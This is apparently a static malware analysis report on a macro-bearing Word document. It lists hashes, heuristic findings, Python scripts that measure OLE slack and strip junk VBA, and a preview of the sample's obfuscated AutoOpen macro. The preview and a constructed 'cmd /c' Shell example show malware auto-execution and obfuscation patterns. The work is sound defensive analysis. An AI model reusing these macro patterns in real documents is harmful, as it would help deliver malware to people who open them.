Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dcc50c63d9a23f4a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 169.5 KB (173,568 bytes)
Created: 2018-04-26 14:33:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: adc55e7dedd1bc636e1ffb153d71cc26
SHA-1: d970e3211922eab95e62e6e15794289c32909c8f
SHA-256: dcc50c63d9a23f4aaf1aa5b81941070ab9f69262d40639ef38b90cb3f7da95aa
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is an OLE (Word binary format) document carrying a VBA project. The critical finding is a Shell() call in the macro code, i.e. an attempt to run an external command line; the Autoopen entry point means the code runs as soon as the document is opened with macros enabled, with no further user interaction. The recovered source (macros.bas, under Extracted artifacts) is padded with dead code: repeated Select Case blocks keyed on variables that are never assigned within their procedure, so they evaluate to Empty (0 in a numeric comparison) and none of the non-zero numeric Case labels can ever match. The bodies are filled with Hex()/ChrW()/CByte()/Log() noise to dilute keyword-based heuristics, and On Error Resume Next suppresses any runtime error. The one live statement visible in Autoopen is the call irAFOphEPzOG (EHzJZd + AKWOjzER + HDYzp); neither the target procedure nor the three string operands are defined within the preview shown. The Shell() call is the primary indicator of malicious activity. Use as a downloader for a second-stage payload is the likely purpose, but it is an inference: static analysis recovered no command line and no URL beyond a standard schema namespace.

Heuristics 6

  • VBA macros detected [medium] (2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code; the decoded project is carved as macros.bas under Extracted artifacts.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The VBA project contains a Shell() call, which runs an arbitrary command line from the macro. Combined with an auto-execution entry point this is the execution primitive of the document. The command string passed to Shell() was not recovered statically.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    Sub Autoopen() is present in the VBA project. Word resolves the name case-insensitively, so it runs automatically when the document is opened with macros enabled.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    OLE file is 173,568 bytes but its declared streams total only 35,321 bytes; the remaining 138,247 bytes (80%) are not covered by any stream's declared size. The rule's generic rationale is that this region is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). For this sample that reading is not the first explanation: a VBA project with a Shell() call was recovered, so the macro is the evident execution path. Note also that the 138,247 figure is simply file size minus declared stream bytes, so it includes the header, FAT and directory sectors, the rounding of each stream up to a whole sector, and any sectors Word left free on re-save. The region is worth carving and checking (entropy, single-byte XOR key search), but the finding is not attribution to a parser CVE.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    The rule fires on a legacy WordBasic auto-execution name such as AutoOpen in an OLE Word document and, by its own description, covers the case where no modern VBA project was recovered and no stronger macro-virus family marker was present. That precondition does not hold here: a VBA project was extracted (macros.bas) and the AutoOpen name is its Sub Autoopen(). Treat this finding as overlapping with OLE_VBA_AUTOOPEN rather than as evidence of a separate Word 6/95 WordBasic surface; it is analyst-facing evidence of auto-execution, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the DrawingML XML namespace identifier that Office writes into embedded XML content; it is a schema name, is not contacted at runtime, and is not an indicator of compromise.
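The OLE_SLACK_ANOMALY number above can be recomputed from the raw Compound File Binary structures rather than taken on trust. The script below is an added example, not the analyzer's or oletools' code: it parses the CFB header, FAT and directory, sums the sizes the directory declares for stream entries (the report's metric), and separately counts sectors that no FAT chain owns, which is the tighter definition of slack. The CFB file it runs on is constructed in memory so the script works offline; the "Macros" stream name, its contents and the 20 appended slack sectors are arbitrary sample values, not data from the analysed document. Only 512-byte-sector (version 3) files with at most 109 FAT sectors are handled, which covers documents of this size.

```python
"""Added example (not the analyzer's own code): recompute the OLE slack metric
from the raw CFB header, FAT and directory.  The input file is built in memory
here (constructed sample, not the analysed document)."""
import struct

SECTOR = 512                       # CFB v3 sector size
FREESECT, ENDOFCHAIN, FATSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD
MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def _sector(data, n):
    """Sector n starts right after the 512-byte header."""
    return data[(n + 1) * SECTOR:(n + 2) * SECTOR]


def _chain(fat, start):
    """Yield the sector numbers of a FAT chain; stops at ENDOFCHAIN or a loop."""
    seen, cur = set(), start
    while cur < len(fat) and cur not in seen:
        seen.add(cur)
        yield cur
        cur = fat[cur]


def ole_slack_report(data):
    """Declared stream bytes vs. file size, plus sector-level ownership accounting."""
    if data[:8] != MAGIC:
        raise ValueError("not an OLE/CFB file")
    if 1 << struct.unpack_from("<H", data, 0x1E)[0] != SECTOR:
        raise ValueError("only 512-byte-sector (v3) files are handled")
    n_fat, first_dir = struct.unpack_from("<II", data, 0x2C)
    # The header DIFAT lists the first 109 FAT sectors, enough for files < ~7 MB.
    difat = struct.unpack_from("<109I", data, 0x4C)
    fat = []
    for sec in difat[:n_fat]:
        fat.extend(struct.unpack("<128I", _sector(data, sec)))
    declared = 0
    for dsec in _chain(fat, first_dir):
        block = _sector(data, dsec)
        for off in range(0, SECTOR, 128):        # 128-byte directory entries
            if block[off + 0x42] == 2:           # object type 2 = stream
                declared += struct.unpack_from("<I", block, off + 0x78)[0]
    n_sectors = -(-(len(data) - SECTOR) // SECTOR)
    unowned = sum(1 for i in range(n_sectors) if i >= len(fat) or fat[i] == FREESECT)
    return {
        "file_size": len(data),
        "declared_stream_bytes": declared,
        "unaccounted_bytes": len(data) - declared,   # the report's headline number
        "unaccounted_pct": round(100 * (len(data) - declared) / len(data), 1),
        "unowned_sectors": unowned,                  # sectors no FAT chain references
        "unowned_bytes": unowned * SECTOR,
    }


def _dir_entry(name, obj_type, start, size, child=FREESECT):
    """One 128-byte directory entry (siblings unused; single-child tree)."""
    raw = name.encode("utf-16-le") + b"\x00\x00"
    e = bytearray(128)
    e[:len(raw)] = raw
    struct.pack_into("<HBB", e, 0x40, len(raw), obj_type, 1)      # name len, type, colour
    struct.pack_into("<III", e, 0x44, FREESECT, FREESECT, child)  # left, right, child
    struct.pack_into("<IQ", e, 0x74, start, size)                  # start sector, size
    return bytes(e)


def build_sample_cfb(stream_bytes, slack_sectors):
    """Constructed sample: sector 0 = FAT, 1 = directory, 2 = one 'Macros' stream,
    then `slack_sectors` sectors that no FAT entry owns (simulated slack)."""
    hdr = bytearray(SECTOR)
    hdr[:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 0x18, 0x3E, 3, 0xFFFE, 9, 6)  # version, byte order, shifts
    # dir-sector count, FAT count, first dir, txn sig, mini cutoff, minifat, minifat count, DIFAT, DIFAT count
    struct.pack_into("<9I", hdr, 0x28, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    struct.pack_into("<109I", hdr, 0x4C, 0, *([FREESECT] * 108))
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, ENDOFCHAIN, *([FREESECT] * 125))
    directory = (_dir_entry("Root Entry", 5, ENDOFCHAIN, 0, child=1)
                 + _dir_entry("Macros", 2, 2, len(stream_bytes))).ljust(SECTOR, b"\x00")
    payload = stream_bytes.ljust(SECTOR, b"\x00")
    slack = b"\x90" * (SECTOR * slack_sectors)       # arbitrary filler for the unowned region
    return bytes(hdr) + fat + directory + payload + slack


if __name__ == "__main__":
    sample = build_sample_cfb(b'Attribute VB_Name = "Module1"\r\n', slack_sectors=20)
    for key, value in ole_slack_report(sample).items():
        print(f"{key}: {value}")
```

On a real document the two numbers diverge: unaccounted_bytes always exceeds the true free space because header, FAT and directory sectors and per-stream rounding are counted against the streams, while unowned_sectors is exactly the set of sectors to carve. A large unowned region in a file that also carries a working VBA project is still worth an entropy and XOR-key pass, but a small one is ordinary Word save behaviour.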

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 52793 bytes
SHA-256: ce1a15875c8cc653a71324b50de18f3fe93825b77dbc27dd671f962fd0ece23d
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "zfAnnQJJ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub UFuwFI(BwdcBR)
Select Case uYTbtR
         Case 25512
            avkpk = Hex(jjAso - ChrW(fitRDB))
            iTYrF = CByte(72325)
            IjFNZ = iPfwOQ
         Case 46232
            VPckMi = LiCYs
            ilBEi = Round(6749)
            AzanS = Log(IPDvCn)
End Select
End Sub
Sub cJDwHs(SwBDo)
Select Case ivdduj
         Case 24757
            cVooR = Hex(VpIjz - ChrW(PjZiEz))
            wtDwXw = CByte(73504)
            MmZBT = RzoPHp
         Case 56921
            cnSEDQ = WvZwzQ
            YWRpf = Round(90789)
            DjhjK = Log(jkTzHJ)
End Select
Select Case QQjSv
         Case 40832
            pqzEV = Hex(waRzR - ChrW(ibZEk))
            sSLmc = CByte(53946)
            oFBIqw = KXTMjd
         Case 20101
            zISVf = ajrLvv
            CMDOX = Round(30276)
            DzRbzX = Log(LHMVHN)
End Select
Select Case SDTGwq
         Case 25971
            JzuDr = Hex(LQzLN - ChrW(zCqrWI))
            Pbiqoh = CByte(22006)
            IkIbYU = nUhvfs
         Case 113
            PJtkuQ = bjosw
            iHFVjX = Round(4590)
            pjoIPO = Log(JacGP)
End Select
End Sub
Sub PjuzRS(IYnjWm)
Select Case NbazU
         Case 95523
            ZZFci = Hex(qSJLm - ChrW(LPaKYO))
            GXRwI = CByte(73551)
            FJiAdl = YpGpU
         Case 75086
            FqPct = atmRBk
            rnIdw = Round(80802)
            zhjIi = Log(QmZUU)
End Select
Select Case boAhB
         Case 39026
            wDLWQ = Hex(sValhd - ChrW(imSYGG))
            sWoUSw = CByte(95555)
            brFGJ = rzmKTJ
         Case 80840
            qAsqcZ = VbbvaV
            OqEUBj = Round(89744)
            faTKnp = Log(NnzDOf)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case cbUYUF
         Case 29477
            LiMPiv = Hex(wIGkH - ChrW(RXRlz))
            OnwWHw = CByte(51002)
            cAcPp = BOlwY
         Case 12724
            HoowdY = KECmU
            BqNME = Round(36887)
            hiwfr = Log(nTDlSN)
End Select
irAFOphEPzOG (EHzJZd + AKWOjzER + HDYzp)
Select Case YSKBZt
         Case 9548
            DdqJFi = Hex(zHSjZb - ChrW(urDma))
            AiFApw = CByte(43065)
            JBMZI = AdIzUv
         Case 74662
            vFNQT = YTzmS
            zYXqU = Round(15964)
            PqGFK = Log(jLQjE)
End Select
End Sub
Sub fIsiz(YdJwpD)
Select Case GzzbG
         Case 35197
            MiXRpz = Hex(AmBHj - ChrW(UnAEqX))
            viCSA = CByte(4127)
            ERjjJQ = Gwlbt
         Case 301
            YrIoGK = Twslj
            jhjER = Round(75598)
            wiCRw = Log(UOqPd)
End Select
Select Case XSXntd
         Case 89127
            alSqza = Hex(oYQhK - ChrW(jmpoq))
            npqcjP = CByte(78543)
            zMuma = vtNPM
         Case 38769
            RjqZh = qqfhz
            nHCjI = Round(68014)
            IODcii = Log(nKmZZ)
End Select
Select Case WSVJAD
         Case 3011
            wVRfuj = Hex(PtJEjk - ChrW(JNDLv))
            fjDGHX = CByte(62462)
            lsiFh = Ktmzju
         Case 37525
            RdUtr = IHFpH
            RRRLXX = Round(5433)
            iAazw = Log(AQbGb)
End Select
End Sub
Sub HHPam(fVMdm)
Select Case zHNtba
         Case 48891
            sBtQC = Hex(ulKsj - ChrW(NHSJCq))
            JrhGA = CByte(26618)
            BrrHoA = QIGNzX
         Case 32975
            uKTzn = qoEqlB
            TKvtC = Round(41197)
            DtDDf = Log(zwMvD)
End Select
End Sub

Attribute VB_Name = "HqzXmDaAL"
Sub nQDzR(zLUwCw)
Select Case AGQSV
         Case 67490
            cInStY = Hex(nIqcU - ChrW(BGnAj))
            BAAbG = CByte(30870)
            bzQVk = RTZfc
         Case 70352
            saKCi = hqNuT
    
... (truncated)
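The listing above is mostly padding: Select Case blocks on never-assigned variables whose Case labels are non-zero integers can never execute, so removing them leaves the handful of statements that matter. The script below is an added example, not the analyzer's or oletools' code, showing that de-junking step and a keyword re-scan of the result. Its input is a constructed VBA snippet written in the style of macros.bas (same dead-block shape, plus a live Select Case on an assigned variable and a Shell() call that builds a harmless echo command); it is not the sample's actual payload, and the Shell command line of the real document was not recovered. The assignment and parameter regexes are a heuristic, not a VBA parser.

```python
"""Added example (not the analyzer's or oletools' code): strip never-executed
Select Case padding from extracted VBA and re-scan the live code for
auto-exec, execution and obfuscation keywords.  SAMPLE_VBA is constructed."""
import re

# Constructed sample input mimicking the extracted macros.bas (not the real payload).
SAMPLE_VBA = '''Attribute VB_Name = "zfAnnQJJ"
Sub Autoopen()
On Error Resume Next
Select Case cbUYUF
         Case 29477
            LiMPiv = Hex(wIGkH - ChrW(RXRlz))
         Case 12724
            HoowdY = KECmU
End Select
cmdA = "cmd /c "
Select Case YSKBZt
         Case 9548
            DdqJFi = Hex(zHSjZb - ChrW(urDma))
         Case 74662
            vFNQT = YTzmS
End Select
mode = 1
Select Case mode
         Case 1
            cmdB = "echo constructed-sample"
End Select
Shell cmdA + cmdB, vbHide
End Sub
'''

ASSIGN_RE = re.compile(r"^\s*(?:Set\s+|For\s+)?([A-Za-z_]\w*)\s*=", re.I | re.M)
DIM_RE = re.compile(r"^\s*Dim\s+([A-Za-z_]\w*)", re.I | re.M)
PARAM_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+\w+\s*\(([^)]*)\)", re.I | re.M)
SELECT_RE = re.compile(r"^\s*Select\s+Case\s+([A-Za-z_]\w*)\s*$", re.I)
SELECT_ANY_RE = re.compile(r"^\s*Select\s+Case\b", re.I)
END_SELECT_RE = re.compile(r"^\s*End\s+Select\b", re.I)
CASE_RE = re.compile(r"^\s*Case\s+(.+?)\s*$", re.I)

KEYWORDS = {   # olevba-style keyword buckets; not an exhaustive list
    "autoexec": ("AutoOpen", "Document_Open", "AutoExec", "Auto_Open", "Workbook_Open"),
    "suspicious": ("Shell", "CreateObject", "WScript.Shell", "URLDownloadToFile", "Environ"),
    "obfuscation": ("Chr", "ChrW", "Hex", "StrReverse", "Xor"),
}


def assigned_names(src):
    """Lower-cased identifiers that can hold a value: assignment targets, Dim'd
    variables and procedure parameters.  Heuristic, not a VBA parser."""
    names = {m.lower() for m in ASSIGN_RE.findall(src)}
    names |= {m.lower() for m in DIM_RE.findall(src)}
    for params in PARAM_RE.findall(src):
        for p in params.split(","):
            m = re.match(r"\s*(?:Optional\s+)?(?:ByVal\s+|ByRef\s+)?([A-Za-z_]\w*)", p, re.I)
            if m:
                names.add(m.group(1).lower())
    return names


def strip_dead_select_blocks(src):
    """Remove Select Case blocks whose selector is never assigned (so it is Empty,
    i.e. 0 in numeric comparison) and whose labels are all non-zero integer
    literals: no Case can run.  Returns (remaining source, blocks removed)."""
    assigned = assigned_names(src)
    lines = src.splitlines()
    out, removed, i = [], 0, 0
    while i < len(lines):
        m = SELECT_RE.match(lines[i])
        if m and m.group(1).lower() not in assigned:
            depth, j, dead = 0, i, True
            while j < len(lines):              # find the matching End Select
                if SELECT_ANY_RE.match(lines[j]):
                    depth += 1
                elif END_SELECT_RE.match(lines[j]):
                    depth -= 1
                    if depth == 0:
                        break
                elif depth == 1:               # only this block's own labels
                    c = CASE_RE.match(lines[j])
                    if c and not re.fullmatch(r"[1-9]\d*", c.group(1)):
                        dead = False           # Case Else / Case 0 / expression could match
                j += 1
            if depth == 0 and dead:
                removed += 1
                i = j + 1
                continue
        out.append(lines[i])
        i += 1
    return "\n".join(out) + "\n", removed


def scan_indicators(src):
    """Map each keyword category to {keyword: [line numbers]} for lines that hit."""
    hits = {cat: {} for cat in KEYWORDS}
    for cat, words in KEYWORDS.items():
        for kw in words:
            pat = re.compile(r"(?<![\w.])" + re.escape(kw) + r"\b", re.I)
            found = [n for n, line in enumerate(src.splitlines(), 1) if pat.search(line)]
            if found:
                hits[cat][kw] = found
    return hits


if __name__ == "__main__":
    live, n = strip_dead_select_blocks(SAMPLE_VBA)
    print(f"removed {n} dead Select Case blocks\n{live}")
    print("raw :", scan_indicators(SAMPLE_VBA))
    print("live:", scan_indicators(live))
```

Run against the real macros.bas, the same pass collapses each procedure to its live statements (for Autoopen, the single call to irAFOphEPzOG) and drops the Hex/ChrW/CByte/Log noise that inflates obfuscation-keyword counts, so the remaining hits are the ones worth reading by hand. Blocks with a Case Else, a Case 0, or a selector that is assigned anywhere are deliberately kept, since those can execute.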